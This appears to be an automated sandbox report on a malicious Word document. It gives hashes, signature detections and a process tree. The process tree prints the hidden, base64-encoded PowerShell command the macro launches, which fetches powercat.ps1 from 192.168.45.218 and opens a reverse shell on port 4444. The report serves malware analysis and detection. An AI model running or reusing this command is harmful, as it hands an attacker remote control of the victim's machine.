Analysis
-
max time kernel
54s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
22-07-2024 21:58
Behavioral task
behavioral1
Sample
a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513.doc
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513.doc
Resource
win10v2004-20240709-en
General
-
Target
a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513.doc
-
Size
30KB
-
MD5
68bc25652d7c957bb2e38bf08cbc29b6
-
SHA1
8aa49fd09dcad64e112ebcf9736d6922b60175c9
-
SHA256
a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513
-
SHA512
d9e87f1d2aea6ee8c2100da6c40a8f2f38075d8dedabf1e408f06ad7813686f6e624d60f71f710e330a1bf779c575b48b8d033c740bbee0db1c28af7f52dd3fd
-
SSDEEP
192:OaIlLZEvA+6/6rNavrgYjk+4bWlMYTxsud3cvP+rDBLg0jw2tqflTXPa:TE8iSwvxjk+tMYN30P+rDZg0j/tq9
Malware Config
Extracted
http://192.168.45.218/powercat.ps1
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2848 1984 powershell.exe 30 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2848 powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1984 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2848 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2848 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1984 WINWORD.EXE 1984 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1984 wrote to memory of 2464 1984 WINWORD.EXE 31 PID 1984 wrote to memory of 2464 1984 WINWORD.EXE 31 PID 1984 wrote to memory of 2464 1984 WINWORD.EXE 31 PID 1984 wrote to memory of 2464 1984 WINWORD.EXE 31 PID 1984 wrote to memory of 2848 1984 WINWORD.EXE 32 PID 1984 wrote to memory of 2848 1984 WINWORD.EXE 32 PID 1984 wrote to memory of 2848 1984 WINWORD.EXE 32 PID 1984 wrote to memory of 2848 1984 WINWORD.EXE 32
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513.doc"1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2464
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMQA4AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMQA4ACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA2⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848
-